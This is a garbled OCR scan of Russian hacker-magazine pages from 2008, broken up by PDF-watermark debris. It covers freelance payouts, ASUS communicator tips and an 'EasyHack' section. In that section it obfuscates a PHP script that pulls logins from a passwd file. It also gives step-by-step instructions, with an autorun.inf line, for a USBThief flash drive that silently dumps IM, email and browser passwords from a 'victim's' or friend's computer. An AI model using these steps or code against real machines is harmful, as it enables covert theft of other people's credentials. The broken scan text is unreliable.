Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
12
Добавлен:
20.04.2024
Размер:
16.11 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

www.Xakep.ru

Хакерскаяпочта

вдомене@xakep.ru

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>>

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

pc_zone

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

НапроектеGetACoder.comпубликуютсяпроектытолькодляпрограммистов,нозатоихоченьмного!

Вывод денег со счета

Итак,делапошли,тыужевыполнилнесколькопроектовихочешьвывести деньгисвнутреннегосчетанаGAF’е.Этоможносделатьнескольки-

миспособами:спомощьюплатежнойсистемыPayPal,переводами Moneybookers,наспециальнуюдебетовуюкарту,посредствомE-Gold илибанковскогоперевода.Ксожалению,PayPalпо-прежнемузапрещает жителямРоссииивсемуСНГприниматьденьгинасвойсчет,поэтомуэтот вариантотпадает.Придетсявыбиратьизоставшихся.Прощевсего,конеч- но,выводитьчерезE-Goldсустановленнойкомиссиейв5%.Минимальная суммавыводанаE-Goldсоставляет$30,максимальная—$250внеделю. Единственнаязагвоздкавтом,чтовпервыйразвыводденегбудетосуществленчерез45дней(антифродсистема).Послетого,какадминистрация убедится,чтотынекардер,выводящийденьгичерезихсервис,транзакции будутосуществлятьсяоченьбыстро.Напомню,чтоE-Goldпростообнали- читьвспециальныхобменникахилипоменятьнаWebmoney.

Чтотакоеescrowсчет?

СразупосленачалаработынаGAF’ефрилансерможетобезопаситьсебяоткидаловаипопроситьзаказчикаперевестиденьги натакназываемыйescrow-счет,которыйкурируетадминист- рациясервиса.Исполнительнеможетзабратьихоттуда,пока заказчикнеподтвердит,чтопроектвыполнен(escrowrelease). Забратьназадденьгисescrow-счетазаказчикможеттолько послеотменыоплатыисполнителем(еслипроектнеможетбыть выполнен).Спорныеслучаирассматриваютсяадминистрацией www.getafreelancer.com.Тоестьescrow—этогарантияполучения оплатыфрилансером.

Дляудобстваярекомендуюзаказатьдебетовуюкарту,котораявысылается почтойиидетоколо четырехнедель.Снейтысможешьсниматьденьгив любомбанкоматеилииспользоватьеедляоплатывмагазине.Комиссия прибольшихсуммахбудетзначительноменьшечем,черезE-Gold.Деньги выводятсясGAFавночьнапонедельник(понашемувремени—где-тов понедельникднем).Правда,естьнюанс,установленныйправиламиGAF’а: впервыйразденьгинужнождатьоколотрехнедель.

Фрилансить или нет

Решать тебе. Я знаю очень многих людей, которые совмещают фриланс и обычную работу. Есть и те, кто работает на себя постоянно. Эти люди не ездят на Porsche Cayenne, но могут позволить себе вполне приличную иномарку. Они не колесят мир в поисках развлечений, но упорно трудятся, зарабатывая деньги. Повторюсь, бесплатного сыра не бывает. z

Информацияопроекте.Деталейзаказчикневыдает

040

xàêåð 05 /113/ 08

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Безопасность

Самыесовременныеспособызащиты

ASUS Trend Club — это клуб для тех, кто всегда хочет быть в курсе актуальных тенденций мира современных технологий. Наши эксперты выбрали 5 основных направлений, в которых будет вести работу Trend Club: развлечения, новинки, безопасность, железо и бизнес. Ежемесячно вы будете получать самую свежую информацию по каждому направлению из журналов* и погружаться в интерактивный мир клуба на сайте www.asusTC.ru.

Новинки

| обо всем новом и уникальном, что ждет нас в будущем

Бизнес

| cовременные технологии и тренды успешного бизнеса

 

 

 

Железо

|

Все самое интересное из мира компьютерного железа

 

 

 

Развлечения

|

Все, что нужно для современного отдыха

 

 

 

* Журналы — участники проекта: «Страна Игр», «MAXI tuning», «Свой бизнес», «Железо», «Хакер», «Мобильные Компьютеры».

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Безопасностьсамыесовременныеспособы защиты

НОВИНКИ | БИЗНЕС | РАЗВЛЕЧЕНИЯ | ЖЕЛЕЗО | БЕЗОПАСНОСТЬ

SMART tricks

Используем

коммуникаторы

Asusна100%

 

Asus P750

чем для обычного компьютера. Но не в

 

• Процессор: Marvell PXA270 520 МГц

 

 

 

 

 

 

наших целях сегодня разбирать стандарт-

 

• Память: 64 Мб RAM, 256 Мб Flash ROM

 

 

 

 

 

ные и всем доступные разработки. Куда

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

интереснее, если ты сможешь использовать

 

• Экран: диагональ 2.6”, разрешение

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

свой коммуникатор нестандартно, выжимая

 

240x320, сенсорный, подсветка, 65536

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

из него настоящий максимум. Вот наши семь

 

цветов

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рекомендаций, как это сделать.

 

• Слоты расширения: microSD (TransFlash),

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

microSDHC, SDIO

 

 

 

 

 

 

 

 

Противоугонная система

 

 

 

 

 

 

 

 

 

 

 

• Коммуникации: EDGE, HSDPA, Wi-Fi,

 

 

 

 

802.11b/g, Bluetooth 2.0

 

 

 

 

 

Сделав дорогостоящую покупку всегда

 

 

 

 

 

 

 

 

хочется обезопасить ее. И дело тут не

 

• Аккумулятор: Li-Ion 1300 мАч

 

 

 

 

 

 

 

 

 

 

только в покупке чехла и защитной пленки

 

• Операционная система: Microsoft Windows

 

 

 

 

 

 

 

на экран. Как обезопасить себя от самого

 

Mobile 6.0 Pro

 

 

 

 

 

 

 

 

 

 

опасного — вора? Но высокие технологии

 

• GPS: SiRFStar III, установлена программа

 

 

 

 

 

были бы не высокими, если бы и на этот счет

 

НАВИТЕЛ НАВИГАТОР 3.1

 

 

 

 

не придумали решение — xRay PDAFinder.

 

• Размер: 58x113x17 мм

 

 

 

Если вдруг телефон окажется в чужих сетях

 

• Вес: 130 грамм

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

и будет включен с «чужой» SIM-картой, про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

грамма тут же отправит SMS на указанный

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тобой номер. А в сообщении укажет: номер

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

телефона, IMSI-код SIM-карты, IMEI комму-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

никатора, название и код сети, в которой

Коммуникатор — это не просто телефон, особенно если это коммуника-

зарегистрирован телефон. Все это быстро

тор Asus. Столь мощные девайсы просто непростительно оставлять без

поможет тебе и компетентным органам найти

дела, используя лишь традиционные функции вроде телефонии, почты и

потерянный/сворованный телефон. Тут есть

мобильного интернета. Сегодня мы научим тебя выжимать из них максимум,

одна хитрость. Если вор быстро сделает для

используя всю мощь этих устройств для упрощения твоей жизни.

коммуникатора так называемый Hard Reset,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

то все установленные программы будут

На рынке мобильной аппаратуры сейчас представлены самые разные

тут же удалены. Выходом из этой ситуа-

телефоны, смартфоны и коммуникаторы. Конечно же, последние пред-

ции является запись программы со всеми

ставляют наибольший интерес: ведь насколько же приятно иметь при

настройками в постоянную память устройст-

себе девайс, на котором можно использовать практически любой софт

ва. О том, как это сделать, можно подробно

— зачастую аналогичный тем программам, которые мы устанавливаем на

прочитать на сайте: 4pda.ru/forum/index.

компьютеры. Для наших экспериментов мы взяли топовую модель комму-

php?showtopic=58768&st=0.

никаторов Asus: сногсшибательный Asus P750. Девайс оборудован про-

Больше памяти!

цессором с частотой 520 МГц, что большая редкость, 64 Мб оперативной

памяти, имеет модули Bluetooth, Wi-Fi, GPS и поддерживает сотовые сети

Когда в системе остается мало памяти, ОС

третьего поколения, которые вот-вот станут доступны в России. Короче

может послать всем приложением систем-

говоря, в этом коммуникаторе есть все, и мы ничем себя не ограничивали.

ное сообщение WM_HIBERNATE. Каждое из

Операционная система Windows Mobile, установленная на коммуникаторах

них должно освободить столько ресурсов,

Asus — это почти такая же ОС, как и обычная винда. Со своей архитекту-

сколько это возможно: путем закрытия

рой, особенностями, и, конечно же, инструментарием для разработчиков

ненужных окон, остановки дополнитель-

— SDK, который каждый вправе использовать по своему усмотрению.

ных процессов и прочими способами. Идея

Именно поэтому программ для мобильной платформы ничуть не меньше,

хорошая, но почему это сообщение стоит

042

xàêåð 05 /113/ 08

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

t

 

 

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

NOW!

r

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

 

 

w Click

 

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Железо

| «Мобильные Компьютеры»

 

 

 

 

 

 

 

 

 

 

 

 

«Посусекамза«АСУСТеКом».Руководстводляпокупателейноутбуков

 

 

 

 

 

 

 

 

 

 

 

 

Развлечения

| «Страна Игр»

 

 

 

 

 

 

В этом месяце

«Игрывдороге».Счемлучшевсегопровестивремявпути

 

 

 

 

 

 

Новинки

| «Железо»

 

 

 

 

 

 

в других журналах клуба:

«холоднаявойна».ТестированиесистемнойплатыASUSP5E3Premium/WiFi-AP@nEdition

 

 

 

 

 

 

Журналы-участники:

Страна игр | Maxi Tuning | Свой бизнес

 

 

 

 

 

 

 

 

 

 

 

 

Железо | Хакер | Мобильные компьютеры

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

посылать, когда системе уже стало

Можно не только просмотреть обыч-

Удаленное

плохо? Куда разумнее высвобождать

ную векторную карту, но и взглянуть

память перед запуском, к примеру,

на местность со спутника. Качество

управление

тяжелого приложения вроде навигаци-

поражает: на снимке отчетливо видна

компьютером/сервером

онной системы с громоздкими картами.

даже спутниковая антенна на крыше

Имея при себе коммуникатор, ты

Если высвободить память заранее

моего дома, а, значит, и некоторые

всегда можешь обратиться к своему

(отправить системное сообщение), то

проселочные дороги, которые на карте

домашнему или рабочему компьютеру.

можно удержать систему от непремен-

никогда не были отмечены. Но что

Удаленный доступ к рабочему столу

но стрессового состояния. И в этом

еще может помочь водителю, кроме

предоставляет отличная программа

поможет небольшая утилита Oxios

автоматического маршрута? Конечно

VNC Viewer for PocketPC (home.utah.

 

 

 

Memory (www.oxios.com). Все, что

же, информация о пробках! Такая воз-

edu/~mcm5849/wince/vnc.html).

надо, это периодически запускать ее

можность доступна пока только для

Причем неважно, какую операционную

и каждый раз удивляться тому объему

жителей обеих столиц. Что интересно,

систему ты используешь дома: Vista,

памяти, который удается получить в

в составлении оперативных данных

Ubuntu Linux или что-то еще. В качестве

свое распоряжение, казалось бы, «из

об обстановке на дороге участвуют

серверной части, которую нужно будет

ничего».

сами водители. С разрешения хозяина

установить, используется известней-

Wi-Fi сканер

программа может передавать инфор-

ший продукт Real VNC, имеющий версии

мацию о том, насколько быстро тот

как для винды и никсов, так и Mac’а.

Ты серьезно думаешь, что для поиска

проехал тот или иной участок. Таким

Для управления сервером зачастую

беспроводных сетей не обойтись

образом, помимо пробок, перекрытий и

удобнее использовать старый-добрый

без ноутбука с установленным

затруднений движения на карте также

протокол SSH. К счастью, доступ к

Netstumbler’ом или другой утилитой из

подсвечиваются свободные участки

удаленной консоли можно получить с

набора беспроводного хакера? Тогда

— улицы, по которым можно ехать

помощью специальной версии PuTTY

знай: коммуникатор Asus P750 спра-

быстрее 40 км/ч. И это максимально

— PocketPuTTY (www.pocketputty.net).

вится с этой задачей ничуть не хуже, а

достоверная и актуальная информа-

Доступные фичи те же: поддержка

то и лучше — потому как спрятанное в

ция!

самых разных протоколов, аутентифи-

карман миниатюрное устройство помо-

Экономим деньги

кации с помощью секретного ключа и

жет просканировать эфир где угодно.

многие другие.

Попробуй ради интереса устроить пу-

и время

Умное общение

тешествие с включенным ноутбуком,

на интернет-трафике

скажем, в Кремль:).

Каждый из нас сталкивался с тем, что

Вот ведь парадокс. Независимо от

Едва ли получится, а вот с коммуни-

GPRS-трафик очень дорогой. Прихо-

того, находится ли человек за тысячу

катором — запросто! Понятно, что стан-

дится сдерживать себя, экономить,

километров, или сидит в соседней ком-

дартная тулза для работы с беспровод-

отключать картинки и т.д. — лишь бы

нате, все равно приходится набирать

ными сетями для этих целей не годится.

баланс моментально не ушел в минус.

его номер. Тратить деньги, бороться с

Поэтому тебе придется поставить

Но имея при себе коммуникатор, у

глюками сети. Но ведь если он совсем

бесплатную утилиту WiFiFoFum (www.

тебя есть возможность использовать

рядом, скажем, едет в соседнем авто-

aspecto-software.com). Поскольку ком-

так называемый компрессор тра-

мобиле, то зачем использовать сото-

муникаторы Asus оборудованы GPS, то

фика, благодаря которому удается

вую связь? Ведь приема в этом месте

каждая найденная точка будет помимо

передавать данные в сжатом виде

может не быть вообще! Что тогда — ос-

прочей информации сопровождаться

и за счет этого серьезно экономить

таться без связи? Ничего подобного!

координатами: широтой и долготой. По

на количестве трафика! Насколько

Если и у тебя, и твоего друга комму-

завершении прогулки ты, экспортиро-

сильно экономить? В разы! toonel.net

никаторы с поддержкой Wi-Fi, то вы

вав данные в KML-файлик, можешь

— это типичный представитель таких

легко можете воспользоваться этим.

скормить его программе Google Earth и

компрессоров и не в пример другим

Программа 4Talk (www.4pockets.com)

получить карту точек доступа, разме-

решениям совершенно бесплатный.

позволяет наладить связь по Wi-Fi

ченную на снимке из космоса!

Утилита устанавливается в систему в

или Bluetooth. Причем утилиту можно

Информация

качестве локального прокси, поэтому

использовать как в полудуплексном

все сетевые программы нужно обя-

режиме (т.е. как рацию — один говорит,

о пробках на экране

зать отдавать данные через прокси

другой слушает), так и в полнодуп-

По правде говоря, я уже и забыл,

сервер: по умолчанию 127.0.0.1:8080.

лексном (разговор ничем не будет

когда пользовался обычной картой. А

Программа эффективно жмет весь

отличаться от обычного телефонного).

зачем? Если большинство карт давно

текстовый трафик, включая вложения

А количество собеседников вовсе

доступны для просмотра на КПК,

в почте. Более того, принудительно

необязательно должно быть равно

причем с возможностью поиска. Такую

сжимает изображения, в результате

двум — их вполне может быть больше!

возможность совершенно бесплатно

картинки получаются с заметно худ-

В окне программы всегда отображает-

предоставляет продукт Мобильные

шим качеством, но зато их не прихо-

ся, кто в настоящий момент находится

Яндекс.Карты (mobile.yandex.ru/maps).

дится отключать полностью!

в эфире.

xàêåð 05 /113/ 08

043

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

EasyHack}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Хакерские секреты

 

 

 

 

 

 

 

 

 

 

простых вещей

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Владимир «Dot.err» Савицкий

Леонид «Cr@wler» Исупов

 

 

леонид «R0id» стройков

 

Андрей «Skvoznoy» Комаров

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/ kaifoflife@bk.ru /

 

/ crawlerhack@rambler.ru /

 

/ r0id@mail.ru /

 

 

/ furyhawk@rambler.ru /

 

1

Задача:ИзменитьвидPHPскрипта,оставивфункциональностьнапрежнемуровне Решение:

Зачастуюнамтребуетсявидоизменитьтотилиинойдвиг/сорецнаПХП. Причинымогутбытьразные:отшифрованиясодержимогодонарушения копирайтов.Утилыдляшифрованияневсегдаудобны,поэтомувоспользуемсяобфускаторомPHPкода.Действоватьбудемнаконкретномпримере.

1.ЕстьподопытныйPHPскрипт:

$fn=fopen("E:\passwd.txt","r");

if(!$fn) { echo("Can’t open passwd.txt");} else { while(!feof($fn)) {

$np=fgets($fn); $str=strrev($np);

$login=substr(strrchr($str,":"),1); $rev=strrev($login); $fp=fopen("E:\logins.txt","a"); fputs($fp,"$rev\n");

fclose($fp); } fclose($fn);

}

Комментироватьсутьскриптанебуду,скажулишь,чтоонвыдираетлогины юзеровизpasswd-файла.

2.Заходимнаhttp://taran.su/abf/изагружаемнашскрипт.Послечего жмембатон«GO».

3.Сохраняемполученныйскрипт.Какуказанонасайте:«PHPabfbetav0.1 этообфускаторPHPкода.Самаобфускациязаключаетсявизмененииимен

переменныхифункций,атакжеудалениилишнихсимволов,врезультате чегозатрудняетсяпониманиекода.Структурасамойпрограммы(последовательностьфункцийиоператоров)неменяется.Процентработоспособ- ностискриптовпослеобработки—порядка70%(возможныпроблемыв скриптах,использующихООП).Вобщем,комуинтересно—пробуем:)». 4.Открываемсохраненныйскриптисмотримсодержимое:

$GLOBALS['

']="\x66\x6F\x70\x65\x6E";

$GLOBALS['

']="\x66\x65\x6F\x66";

$GLOBALS['

']="\x66\x67\x65\x74\x73";

$GLOBALS['

']="\x73\x74\x72\x72\x65\x76";

$GLOBALS['

']="\x73\x75\x62\x73\x74\x72";

$GLOBALS['

']=”\x73\x74\x72\x72\x63\x68\x72";

$GLOBALS['

']="\x66\x70\x75\x74\x73";

$GLOBALS['

']="\x66\x63\x6C\x6F\x73\x65";

$=$GLOBALS[' ']("E:\passwd.txt","r");

if(!$ ) { echo("Can’t open passwd.txt"); }

else {

 

while(!$GLOBALS['

']($

)) {

 

 

 

$

=$GLOBALS['

']($

);

 

 

 

$

=$GLOBALS['

‘]($

);

 

 

 

$

=$GLOBALS['

']($GLOBALS['

']($

,":"),1);

$

=$GLOBALS['

']($

);

 

 

$=$GLOBALS[' ']("E:\logins.txt","a");

$GLOBALS['

']($

,"$

\n");

$GLOBALS['

']($

);

 

}

 

 

 

$GLOBALS['

']($

);

 

}

5.Убеждаемсявработоспособностискриптаирадуемся.

5а.Передзаливкойпотривсекомменты,ибообфускаторнеумеетсними работать.

2

Задача: Быстроинезаметнослитьпаролислокального компанафлешку Решение:

Вопрососозданиифлешки«ближнегобоя»известендавно.Взависимости отОС,нуждитребуемыхрезультатовонрешалсяпо-разному.Существует относительнопростойспособподготовитьносительоперативногоисполь- зования.Все,чтооттебяпотребуется—этопрямыерукиичеткоесоблюде- ниеописанныхнижеинструкций.Приступим.

1.Сливаем утилу USBThief, которую мы заботливо выложили для тебя на нашем DVD.

2.Распаковываем архив и смотрим содержимое папки:

• batexe

• icons

• Dump

• nircmd.exe

• autorun.inf

3.Копируем содержимое себе на флешку, не забыв про авторан:

[autorun]

action=Open Files On Folder icon=icons\drive.ico

shellexecute=nircmd.exe execmd CALL batexe\progstart. bat

4.Приходим в гости к потенциальной жертве. Улучив момент, подходим к компу и вставляем флешку в свободный разъем. Ждем примерно минуту и вынимаем носитель.

044

xàêåð 05 /113/ 08

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

>> взломto BUY

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

5.Довольствуемся урожаем, среди которого:

• Аккаунты к IM-клиентам • Мыльные аккаунты

• Сохраненные логины/пароли в ослике • Журнал посещений

• Информация об ОС, апдейтах, лицензиях, etc

№3

Задача: Награбитьпроксиковсвеба Решение:

Иногдаодного-двухпроксиковбываетнедостаточно.Этоможетбытьвы- званоособенностьюсофтаилипоставленнойзадачей.Требуютсябольшие прокси-листы,ноотдаватьзанихденьгиизсобственногокармананеочень приятно.Можнообратитьвниманиенапаблик-прокси.Ониотличноподой- дутдляиспользованиявсканерах(идругомполезномсофте).Возникает лишьоднапроблема—сборпроксиковсвеба.

1.Работатьбудемсоскриптомproxygrabber.php:

set_time_limit(0);

if(!isset($_POST['filename'])) { exit(0); }

$mask = '/[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0- 9]{1,3}:[0-9]+/';

$fd = fopen($_POST['filename'], "rt") or die("Can’t open file");

$site_list = explode("\n", fread($fd, 9999)); foreach ($site_list as $site)

{

if ( ($site_fd = fopen($site, "rt")) !== false)

{

• Данные об открытых портах

Это далеко не полный список того, что ты можешь выловить в папке /Dump после похода в гости. Кстати, утила функционирует практически незаметно. Так что, не опасаясь разоблачения, можешь дать флешку товарищу якобы, чтобы слить у него музыки/софта.

while(!feof($site_fd))

{

$str = "";

$str = fgets($site_fd, 1024);

if (preg_match($mask, $str, $ip))

{

echo $ip[0] . "<br>";

}

}

}

}

